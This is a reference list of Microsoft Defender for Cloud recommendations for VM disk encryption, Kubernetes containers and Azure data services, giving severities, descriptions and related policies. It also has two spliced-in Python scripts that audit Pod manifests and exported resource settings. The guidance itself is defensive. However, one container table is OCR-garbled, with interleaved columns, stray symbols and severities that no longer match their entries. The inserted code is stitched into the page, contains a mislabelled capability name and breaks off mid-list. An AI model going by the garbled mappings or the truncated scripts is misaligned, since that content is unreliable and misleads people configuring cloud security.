Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys; temp disks and data caches aren't encrypted, and data isn't encrypted when flowing between compute and storage resources. Use Azure Disk Encryption or EncryptionAtHost to encrypt all this data. Visit https://aka.ms/diskencryptioncomparison to compare encryption offerings. This policy requires two prerequisites to be deployed to the policy assignment scope. For details, visit https://aka.ms/gcpol.
(Related policy: [Preview]: Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost)


Recommendation: [Preview]: Windows virtual machines should enable Azure Disk Encryption or EncryptionAtHost
Severity: High
Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys; temp disks and data caches aren't encrypted, and data isn't encrypted when flowing between compute and storage resources. Use Azure Disk Encryption or EncryptionAtHost to encrypt all this data. Visit https://aka.ms/diskencryptioncomparison to compare encryption offerings. This policy requires two prerequisites to be deployed to the policy assignment scope. For details, visit https://aka.ms/gcpol.
(Related policy: [Preview]: Windows virtual machines should enable Azure Disk Encryption or EncryptionAtHost)


Container recommendations

There are 27 recommendations in this category.

Recommendation: [Enable if required] Container registries should be encrypted with a customer-managed key (CMK)
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements. To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.
Use customer-managed keys to manage the encryption at rest of the contents of your registries. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys (CMK) are commonly required to meet regulatory compliance standards. CMKs enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. Learn more about CMK encryption at https://aka.ms/acr/CMK.
(Related policy: Container registries should be encrypted with a customer-managed key (CMK))


Recommendation: Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed
Severity: High
Description: Azure Policy extension for Kubernetes extends Gatekeeper v3, an admission controller webhook for Open Policy Agent (OPA), to apply at-scale enforcements and safeguards on your clusters in a centralized, consistent manner.
(No related policy)

Recommendation: Azure Arc-enabled Kubernetes clusters should have the Defender extension installed
Severity: High
Description: Defender's extension for Azure Arc provides threat protection for your Arc-enabled Kubernetes clusters. The extension collects data from all control plane (master) nodes in the cluster and sends it to the Microsoft Defender for Kubernetes backend in the cloud for further analysis. Learn more.
(No related policy)

Recommendation: Azure Kubernetes Service clusters should have Defender profile enabled
Severity: High
Description: Microsoft Defender for Containers provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, and run-time protection. When you enable the SecurityProfile.AzureDefender profile on your Azure Kubernetes Service cluster, an agent is deployed to your cluster to collect security event data. Learn more in Introduction to Microsoft Defender for Containers.
(No related policy)

Recommendation: Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed
Severity: High
Description: Azure Policy add-on for Kubernetes extends Gatekeeper v3, an admission controller webhook for Open Policy Agent (OPA), to apply at-scale enforcements and safeguards on your clusters in a centralized, consistent manner. Defender for Cloud requires the Add-on to audit and enforce security capabilities and compliance inside your clusters. Learn more. Requires Kubernetes v1.14.0 or later.
(Related policy: Azure Policy Add-on for Kubernetes service (AKS) should be installed and enabled on your clusters)

Recommendation: Container CPU and memory limits should be enforced
Severity: Medium
Description: Enforcing CPU and memory limits prevents resource exhaustion attacks (a form of denial of service attack). We recommend setting limits for containers to ensure the runtime prevents the container from using more than the configured resource limit.
(Related policy: Ensure container CPU and memory resource limits do not exceed the specified limits in Kubernetes cluster)


Recommendation: Container images should be deployed from trusted registries only
Severity: High
Description: Images running on your Kubernetes cluster should come from known and monitored container image registries. Trusted registries reduce your cluster's exposure risk by limiting the potential for the introduction of unknown vulnerabilities, security issues and malicious images.
(Related policy: Ensure only allowed container images in Kubernetes cluster)

Recommendation: Container registries should not allow unrestricted network access
Severity: Medium
Description: Azure container registries by default accept connections over the internet from hosts on any network. To protect your registries from potential threats, allow access from only specific public IP addresses or address ranges. If your registry doesn't have an IP/firewall rule or a configured virtual network, it will appear in the unhealthy resources. Learn more about Container Registry network rules here: https://aka.ms/acr/portal/public-network and here https://aka.ms/acr/vnet.
(Related policy: Container registries should not allow unrestricted network access)

Recommendation: Container registries should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your container registries instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/acr/private-link.
(Related policy: Container registries should use private link)

Recommendation: Container registry images should have vulnerability findings resolved (powered by Qualys)
Severity: High
Description: Container image vulnerability assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks.
(Related policy: Vulnerabilities in Azure Container Registry images should be remediated)

Recommendation: Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) - Preview
Severity: High
Description: Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. Resolving vulnerabilities can greatly improve your security posture, ensuring images are safe to use prior to deployment.
(Related policy: Vulnerabilities in Azure Container Registry images should be remediated)


Recommendation: Container with privilege escalation should be avoided
Severity: Medium
Description: Containers shouldn't run with privilege escalation to root in your Kubernetes cluster. The AllowPrivilegeEscalation attribute controls whether a process can gain more privileges than its parent process.
(Related policy: Kubernetes clusters should not allow container privilege escalation)

Recommendation: Containers sharing sensitive host namespaces should be avoided
Severity: Medium
Description: To protect against privilege escalation outside the container, avoid pod access to sensitive host namespaces (host process ID and host IPC) in a Kubernetes cluster.
(Related policy: Kubernetes cluster containers should not share host process ID or host IPC namespace)

Recommendation: Containers should only use allowed AppArmor profiles
Severity: High
Description: Containers running on Kubernetes clusters should be limited to allowed AppArmor profiles only. AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program.
(Related policy: Kubernetes cluster containers should only use allowed AppArmor profiles)

Recommendation: Diagnostic logs in Kubernetes services should be enabled
Severity: Low
Description: Enable diagnostic logs in your Kubernetes services and retain them up to a year. This enables you to recreate activity trails for investigation purposes when a security incident occurs.
(No related policy)

Recommendation: Immutable (read-only) root filesystem should be enforced for containers
Severity: Medium
Description: Containers should run with a read only root file system in your Kubernetes cluster. An immutable filesystem protects containers from changes at run-time, such as malicious binaries being added to PATH.
(Related policy: Kubernetes cluster containers should run with a read only root file system)

Recommendation: Kubernetes API server should be configured with restricted access
Severity: High
Description: To ensure that only applications from allowed networks, machines, or subnets can access your cluster, restrict access to your Kubernetes API server. You can restrict access by defining authorized IP ranges, or by setting up your API servers as private clusters as explained in Create a private Azure Kubernetes Service cluster.
(Related policy: Authorized IP ranges should be defined on Kubernetes Services)

Recommendation: Kubernetes clusters should be accessible only over HTTPS
Severity: High
Description: Use of HTTPS ensures authentication and protects data in transit from network layer eavesdropping attacks. This capability is currently generally available for Kubernetes Service (AKS), and in preview for AKS Engine and Azure Arc-enabled Kubernetes. For more info, visit https://aka.ms/kubepolicydoc.
(Related policy: Enforce HTTPS ingress in Kubernetes cluster)


Recommendation: Kubernetes clusters should disable automounting API credentials
Severity: High
Description: Disable automounting API credentials to prevent a potentially compromised Pod resource from running API commands against Kubernetes clusters. For more information, see https://aka.ms/kubepolicydoc.
(Related policy: Kubernetes clusters should disable automounting API credentials)

Recommendation: Kubernetes clusters should not grant CAP_SYS_ADMIN security capabilities
Severity: High
Description: To reduce the attack surface of your containers, restrict CAP_SYS_ADMIN Linux capabilities. For more information, see https://aka.ms/kubepolicydoc.
(No related policy)

Recommendation: Kubernetes clusters should not use the default namespace
Severity: Low
Description: Prevent usage of the default namespace in Kubernetes clusters to protect against unauthorized access for ConfigMap, Pod, Secret, Service, and ServiceAccount resource types. For more information, see https://aka.ms/kubepolicydoc.
(Related policy: Kubernetes clusters should not use the default namespace)

Recommendation: Least privileged Linux capabilities should be enforced for containers
Severity: Medium
Description: To reduce the attack surface of your container, restrict Linux capabilities and grant specific privileges to containers without granting all the privileges of the root user. We recommend dropping all capabilities, then adding those that are required.
(Related policy: Kubernetes cluster containers should only use allowed capabilities)

Recommendation: Microsoft Defender for Containers should be enabled
Severity: High
Description: Microsoft Defender for Containers provides hardening, vulnerability assessment and run-time protections for your Azure, hybrid, and multi-cloud Kubernetes environments. You can use this information to quickly remediate security issues and improve the security of your containers.
Important: Remediating this recommendation will result in charges for protecting your Kubernetes clusters. If you don't have any Kubernetes clusters in this subscription, no charges will be incurred. If you create any Kubernetes clusters on this subscription in the future, they will automatically be protected and charges will begin at that time.
Learn more in Introduction to Microsoft Defender for Containers.
(No related policy)


Recommendation 


Privileged containers 
should be avoided Z 


Role-Based Access 
Control should be used 


on Kubernetes Services E 


Running containers as 
root user should be 
avoided 7 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Qualys) Z 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) Si 


Services should listen on 


allowed ports only £ 


Description 


Containers. 
(No related policy) 


To prevent unrestricted host access, avoid privileged 
containers whenever possible. 

Privileged containers have all of the root capabilities of a 
host machine. They can be used as entry points for attacks 
and to spread malicious code or malware to compromised 
applications, hosts and networks. 


(Related policy: Do not allow privileged containers in 
Kubernetes cluster £) 


To provide granular filtering on the actions that users can 
perform, use Role-Based Access Control (RBAC) to manage 
permissions in Kubernetes Service Clusters and configure 
relevant authorization policies. For more information, see 
Azure role-based access control. 

(Related policy: Role-Based Access Control (RBAC) should 
be used on Kubernetes Services E) 


Containers shouldn't run as root users in your Kubernetes 
cluster. Running a process as the root user inside a 
container runs it as root on the host. If there's a 
compromise, an attacker has root in the container, and any 
misconfigurations become easier to exploit. 

(Related policy: Kubernetes cluster pods and containers 
should only run with approved user and group IDs £) 


Container image vulnerability assessment scans container 
images running on your Kubernetes clusters for security 
vulnerabilities and exposes detailed findings for each 
image. Resolving the vulnerabilities can greatly improve 
your containers’ security posture and protect them from 
attacks. 

(No related policy) 


Container image vulnerability assessment scans your 
registry for commonly known vulnerabilities (CVEs) and 
provides a detailed vulnerability report for each image. 
This recommendation provides visibility to vulnerable 
images currently running in your Kubernetes clusters. 
Remediating vulnerabilities in container images that are 
currently running is key to improving your security 
posture, significantly reducing the attack surface for your 
containerized workloads. 


To reduce the attack surface of your Kubernetes cluster, 
restrict access to the cluster by limiting services access to 


Severity 


Medium 


High 


High 


High 


High 


Medium 


Recommendation Er GEA Severity 
(Related_policy: Ensure services listen only on allowed 


ports in Kubernetes cluster Z) 


Usage of host Restrict pod access to the host network and the allowable Medium 
networking and ports host port range in a Kubernetes cluster. Pods created with 
should be restricted Z the hostNetwork attribute enabled will share the node's 


network space. To avoid compromised container from 
sniffing network traffic, we recommend not putting your 
pods on the host network. If you need to expose a 
container port on the node's network, and using a 
Kubernetes Service node port does not meet your needs, 
another possibility is to specify a hostPort for the container 
in the pod spec. 

(Related policy: Kubernetes cluster pods should only use 
approved host network and port range £) 


Usage of pod HostPath We recommend limiting pod HostPath volume mounts in Medium 
volume mounts should your Kubernetes cluster to the configured allowed host 

be restricted toa known paths. If there's a compromise, the container node access 

list to restrict node from the containers should be restricted. 

access from (Related policy: Kubernetes cluster pod hostPath volumes 


compromised containers £ should only use allowed host paths £ ) 
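Several of the pod-level recommendations above (automounted API credentials, the default namespace, CAP_SYS_ADMIN and other capabilities, privileged and root containers, host networking and hostPort, hostPath volumes, and the read-only root filesystem policy) can be checked directly against a Pod manifest before it reaches the cluster. The following script is an added example, not Defender for Cloud's own assessment logic; the hostPath allow-list and hostPort range it takes are assumed operator-configured parameters, and the two manifests are constructed samples.

```python
import json

# Each finding id maps to the recommendation (or related policy) in the
# table above that it corresponds to.
RECOMMENDATIONS = {
    "automount": "Kubernetes clusters should disable automounting API credentials",
    "sys_admin": "Kubernetes clusters should not grant CAPSYSADMIN security capabilities",
    "default_ns": "Kubernetes clusters should not use the default namespace",
    "caps": "Least privileged Linux capabilities should be enforced for containers",
    "privileged": "Privileged containers should be avoided",
    "root": "Running containers as root user should be avoided",
    "host_net": "Usage of host networking and ports should be restricted",
    "host_path": "Usage of pod HostPath volume mounts should be restricted to a known list",
    "ro_rootfs": "Kubernetes cluster containers should run with a read only root file system",
}


def _containers(spec):
    """All containers of the pod, init containers included."""
    return list(spec.get("initContainers", [])) + list(spec.get("containers", []))


def audit_pod(manifest, allowed_host_paths=(), allowed_host_ports=(30000, 32767)):
    """Return the sorted list of finding ids for one Pod manifest.

    allowed_host_paths: hostPath allow-list configured by the operator (assumed).
    allowed_host_ports: inclusive (low, high) range a hostPort may use; the
    default here is an assumption, the real range is a policy parameter.
    """
    meta = manifest.get("metadata", {})
    spec = manifest.get("spec", {})
    pod_sc = spec.get("securityContext", {})
    findings = set()

    if meta.get("namespace", "default") == "default":
        findings.add("default_ns")
    # The service-account token is mounted unless the pod opts out explicitly.
    if spec.get("automountServiceAccountToken", True):
        findings.add("automount")
    if spec.get("hostNetwork", False):
        findings.add("host_net")
    for vol in spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path is not None and path not in allowed_host_paths:
            findings.add("host_path")

    low, high = allowed_host_ports
    for c in _containers(spec):
        sc = c.get("securityContext", {})
        caps = sc.get("capabilities", {})
        if sc.get("privileged", False):
            findings.add("privileged")
        # Container settings override pod-level ones. UID 0, or neither a
        # runAsUser nor runAsNonRoot, means the process may run as root.
        uid = sc.get("runAsUser", pod_sc.get("runAsUser"))
        non_root = sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot", False))
        if uid == 0 or (uid is None and not non_root):
            findings.add("root")
        if "SYS_ADMIN" in caps.get("add", []):
            findings.add("sys_admin")
        # Drop everything first, then add back only what is required.
        if "ALL" not in caps.get("drop", []):
            findings.add("caps")
        if not sc.get("readOnlyRootFilesystem", False):
            findings.add("ro_rootfs")
        for port in c.get("ports", []):
            host_port = port.get("hostPort")
            if host_port is not None and not low <= host_port <= high:
                findings.add("host_net")
    return sorted(findings)


# Constructed sample manifests (kubectl accepts JSON as well as YAML).
WEAK_POD = json.loads("""{
  "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
  "spec": {
    "hostNetwork": true,
    "containers": [{"name": "app", "image": "example/app:1.0",
      "securityContext": {"privileged": true, "capabilities": {"add": ["SYS_ADMIN"]}}}],
    "volumes": [{"name": "host", "hostPath": {"path": "/"}}]
  }
}""")

HARDENED_POD = json.loads("""{
  "apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "web", "namespace": "web-prod"},
  "spec": {
    "automountServiceAccountToken": false,
    "securityContext": {"runAsNonRoot": true, "runAsUser": 10001},
    "containers": [{"name": "app", "image": "example/app:1.0",
      "ports": [{"containerPort": 8080}],
      "securityContext": {"readOnlyRootFilesystem": true,
        "allowPrivilegeEscalation": false,
        "capabilities": {"drop": ["ALL"], "add": ["NET_BIND_SERVICE"]}}}],
    "volumes": [{"name": "tmp", "emptyDir": {}}]
  }
}""")

if __name__ == "__main__":
    for label, pod in (("weak", WEAK_POD), ("hardened", HARDENED_POD)):
        print(f"{label}: {len(audit_pod(pod))} finding(s)")
        for fid in audit_pod(pod):
            print("  -", RECOMMENDATIONS[fid])
```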


Data recommendations

There are 78 recommendations in this category.

Recommendation: [Enable if required] Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements. To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Use customer-managed keys to manage the encryption at rest of your Azure Cosmos DB. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys (CMK) are commonly required to meet regulatory compliance standards. CMKs enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. Learn more about CMK encryption at https://aka.ms/cosmosdb-cmk.
(Related policy: Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest)

Recommendation: [Enable if required] Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements. To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Manage encryption at rest of your Azure Machine Learning workspace data with customer-managed keys (CMK). By default, customer data is encrypted with service-managed keys, but CMKs are commonly required to meet regulatory compliance standards. CMKs enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. Learn more about CMK encryption at https://aka.ms/azureml-workspaces-cmk.
(Related policy: Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK))

Recommendation: [Enable if required] Cognitive Services accounts should enable data encryption with a customer-managed key (CMK)
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements.

To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Customer-managed keys (CMK) are commonly required to meet regulatory compliance standards. CMKs enable the data stored in Cognitive Services to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. Learn more about CMK encryption at https://aka.ms/cosmosdb-cmk.
(Related policy: Cognitive Services accounts should enable data encryption with a customer-managed key (CMK))

Recommendation: [Enable if required] MySQL servers should use customer-managed keys to encrypt data at rest
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements.

To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Use customer-managed keys to manage the encryption at rest of your MySQL servers. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys (CMK) are commonly required to meet regulatory compliance standards. CMKs enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management.
(Related policy: Bring your own key data protection should be enabled for MySQL servers)

Recommendation: [Enable if required] PostgreSQL servers should use customer-managed keys to encrypt data at rest
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements.

To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Use customer-managed keys to manage the encryption at rest of your PostgreSQL servers. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys (CMK) are commonly required to meet regulatory compliance standards. CMKs enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management.
(Related policy: Bring your own key data protection should be enabled for PostgreSQL servers)


Recommendation: [Enable if required] SQL managed instances should use customer-managed keys to encrypt data at rest
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements.

To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Implementing Transparent Data Encryption (TDE) with your own key provides you with increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties. This recommendation applies to organizations with a related compliance requirement.
(Related policy: SQL managed instances should use customer-managed keys to encrypt data at rest)

Recommendation: [Enable if required] SQL servers should use customer-managed keys to encrypt data at rest
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements.

To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Implementing Transparent Data Encryption (TDE) with your own key provides increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties. This recommendation applies to organizations with a related compliance requirement.
(Related policy: SQL servers should use customer-managed keys to encrypt data at rest)

Recommendation: [Enable if required] Storage accounts should use customer-managed key (CMK) for encryption
Severity: Low
Description: Recommendations to use customer-managed keys for encryption of data at rest are not assessed by default, but are available to enable for applicable scenarios. Data is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when obligated by compliance or restrictive policy requirements. To enable this recommendation, navigate to your Security Policy for the applicable scope, and update the Effect parameter for the corresponding policy to audit or enforce the use of customer-managed keys. Learn more in Manage security policies.

Secure your storage account with greater flexibility using customer-managed keys (CMKs). When you specify a CMK, that key is used to protect and control access to the key that encrypts your data. Using CMKs provides additional capabilities to control rotation of the key encryption key or cryptographically erase data.
(Related policy: Storage accounts should use customer-managed key (CMK) for encryption)

Recommendation: All advanced threat protection types should be enabled in SQL managed instance advanced data security settings
Severity: Medium
Description: It is recommended to enable all advanced threat protection types on your SQL managed instances. Enabling all types protects against SQL injection, database vulnerabilities, and any other anomalous activities.
(No related policy)

Recommendation: All advanced threat protection types should be enabled in SQL server advanced data security settings
Severity: Medium
Description: It is recommended to enable all advanced threat protection types on your SQL servers. Enabling all types protects against SQL injection, database vulnerabilities, and any other anomalous activities.
(No related policy)

Recommendation: API Management services should use a virtual network
Severity: Medium
Description: Azure Virtual Network deployment provides enhanced security, isolation and allows you to place your API Management service in a non-internet routable network that you control access to. These networks can then be connected to your on-premises networks using various VPN technologies, which enables access to your backend services within the network and/or on-premises. The developer portal and API gateway can be configured to be accessible either from the Internet or only within the virtual network.
(Related policy: API Management services should use a virtual network)

Recommendation: App Configuration should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your app configuration instances instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/appconfig/private-endpoint.
(Related policy: App Configuration should use private link)

Recommendation: Audit retention for SQL servers should be set to at least 90 days
Severity: Low
Description: Audit SQL servers configured with an auditing retention period of less than 90 days.
(Related policy: SQL servers should be configured with 90 days auditing retention or higher.)

Recommendation: Auditing on SQL server should be enabled
Severity: Low
Description: Enable auditing on your SQL Server to track database activities across all databases on the server and save them in an audit log.
(Related policy: Auditing on SQL server should be enabled)

Recommendation: Auto provisioning of the Log Analytics agent should be enabled on subscriptions
Severity: Low
Description: To monitor for security vulnerabilities and threats, Microsoft Defender for Cloud collects data from your Azure virtual machines. Data is collected by the Log Analytics agent, formerly known as the Microsoft Monitoring Agent (MMA), which reads various security-related configurations and event logs from the machine and copies the data to your Log Analytics workspace for analysis. We recommend enabling auto provisioning to automatically deploy the agent to all supported Azure VMs and any new ones that are created.
(Related policy: Auto provisioning of the Log Analytics agent should be enabled on your subscription)

Recommendation: Azure Cache for Redis should reside within a virtual network
Severity: Medium
Description: Azure Virtual Network (VNet) deployment provides enhanced security and isolation for your Azure Cache for Redis, as well as subnets, access control policies, and other features to further restrict access. When an Azure Cache for Redis instance is configured with a VNet, it is not publicly addressable and can only be accessed from virtual machines and applications within the VNet.
(Related policy: Azure Cache for Redis should reside within a virtual network)

Recommendation: Azure Database for MySQL should have an Azure Active Directory administrator provisioned
Severity: Medium
Description: Provision an Azure AD administrator for your Azure Database for MySQL to enable Azure AD authentication. Azure AD authentication enables simplified permission management and centralized identity management of database users and other Microsoft services.
(Related policy: An Azure Active Directory administrator should be provisioned for MySQL servers)

Recommendation: Azure Database for PostgreSQL should have an Azure Active Directory administrator provisioned
Severity: Medium
Description: Provision an Azure AD administrator for your Azure Database for PostgreSQL to enable Azure AD authentication. Azure AD authentication enables simplified permission management and centralized identity management of database users and other Microsoft services.
(Related policy: An Azure Active Directory administrator should be provisioned for PostgreSQL servers)

Recommendation: Azure Cosmos DB accounts should have firewall rules
Severity: Medium
Description: Firewall rules should be defined on your Azure Cosmos DB accounts to prevent traffic from unauthorized sources. Accounts that have at least one IP rule defined with the virtual network filter enabled are deemed compliant. Accounts disabling public access are also deemed compliant.
(Related policy: Azure Cosmos DB accounts should have firewall rules)

Recommendation: Azure Event Grid domains should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your Event Grid domains instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/privateendpoints.
(Related policy: Azure Event Grid domains should use private link)

Recommendation: Azure Event Grid topics should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your topics instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/privateendpoints.
(Related policy: Azure Event Grid topics should use private link)

Recommendation: Azure Machine Learning workspaces should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your Azure Machine Learning workspaces instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/azureml-workspaces-privatelink.
(Related policy: Azure Machine Learning workspaces should use private link)

Recommendation: Azure SignalR Service should use private link
Severity: Medium
Description: Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The private link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your SignalR resources instead of the entire service, you'll also be protected against data leakage risks. Learn more at: https://aka.ms/asrs/privatelink.
(Related policy: Azure SignalR Service should use private link)
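The SQL auditing and audit-retention, SQL customer-managed TDE key, Cosmos DB firewall and Azure AD administrator recommendations above can be expressed as checks over an exported list of resources, which is how a team might track these items between Defender for Cloud assessments. The following script is an added example rather than Defender for Cloud's assessment engine; it assumes the ARM resource-type and property names it reads (auditingSettings state/retentionDays, encryptionProtector serverKeyType, Cosmos DB ipRules/isVirtualNetworkFilterEnabled/publicNetworkAccess, administrators administratorType), treats a retentionDays of 0 as unlimited retention, and uses constructed resource ids.

```python
# Resource ids below are constructed sample data, not real resources.
RG = ("/subscriptions/00000000-0000-0000-0000-000000000000"
      "/resourceGroups/rg-data/providers/")
MIN_AUDIT_RETENTION_DAYS = 90  # from the recommendation text


def _res(id_suffix, rtype, properties):
    """One entry in the shape of an ARM export (constructed)."""
    return {"id": RG + id_suffix, "type": rtype, "properties": properties}


def _children(resources, parent_id, child_type):
    """Child settings of a resource, located by id prefix and type."""
    prefix = parent_id.lower() + "/"
    return [r for r in resources
            if r["type"].lower() == child_type.lower()
            and r["id"].lower().startswith(prefix)]


def _check_sql_server(server, resources):
    findings = []
    audits = _children(resources, server["id"], "Microsoft.Sql/servers/auditingSettings")
    audit = audits[0]["properties"] if audits else {}
    if audit.get("state") != "Enabled":
        findings.append("Auditing on SQL server should be enabled")
    else:
        # retentionDays 0 is taken to mean unlimited retention (assumed API
        # semantics), which satisfies the 90-day minimum.
        days = audit.get("retentionDays", 0)
        if days != 0 and days < MIN_AUDIT_RETENTION_DAYS:
            findings.append("Audit retention for SQL servers should be set to at least 90 days")
    # Opt-in ("Enable if required") recommendation, reported for completeness.
    protectors = _children(resources, server["id"], "Microsoft.Sql/servers/encryptionProtector")
    key_type = protectors[0]["properties"].get("serverKeyType") if protectors else "ServiceManaged"
    if key_type != "AzureKeyVault":
        findings.append("[Enable if required] SQL servers should use customer-managed keys to encrypt data at rest")
    return findings


def _check_cosmos(account):
    p = account["properties"]
    # Compliant per the table: public access disabled, or at least one IP
    # rule with the virtual network filter enabled.
    if p.get("publicNetworkAccess") == "Disabled":
        return []
    if p.get("ipRules") and p.get("isVirtualNetworkFilterEnabled"):
        return []
    return ["Azure Cosmos DB accounts should have firewall rules"]


def _check_open_source_db(server, resources, engine):
    admins = _children(resources, server["id"],
                       f"Microsoft.DBfor{engine}/servers/administrators")
    if any(a["properties"].get("administratorType") == "ActiveDirectory" for a in admins):
        return []
    return [f"Azure Database for {engine} should have an Azure Active Directory "
            "administrator provisioned"]


def evaluate(resources):
    """Map each top-level resource id to the recommendations it fails."""
    report = {}
    for r in resources:
        t = r["type"].lower()
        if t == "microsoft.sql/servers":
            report[r["id"]] = _check_sql_server(r, resources)
        elif t == "microsoft.documentdb/databaseaccounts":
            report[r["id"]] = _check_cosmos(r)
        elif t in ("microsoft.dbformysql/servers", "microsoft.dbforpostgresql/servers"):
            engine = "MySQL" if "mysql" in t else "PostgreSQL"
            report[r["id"]] = _check_open_source_db(r, resources, engine)
    return report


SAMPLE_EXPORT = [
    _res("Microsoft.Sql/servers/sql-weak", "Microsoft.Sql/servers", {}),
    _res("Microsoft.Sql/servers/sql-weak/auditingSettings/default",
         "Microsoft.Sql/servers/auditingSettings", {"state": "Enabled", "retentionDays": 30}),
    _res("Microsoft.Sql/servers/sql-good", "Microsoft.Sql/servers", {}),
    _res("Microsoft.Sql/servers/sql-good/auditingSettings/default",
         "Microsoft.Sql/servers/auditingSettings", {"state": "Enabled", "retentionDays": 0}),
    _res("Microsoft.Sql/servers/sql-good/encryptionProtector/current",
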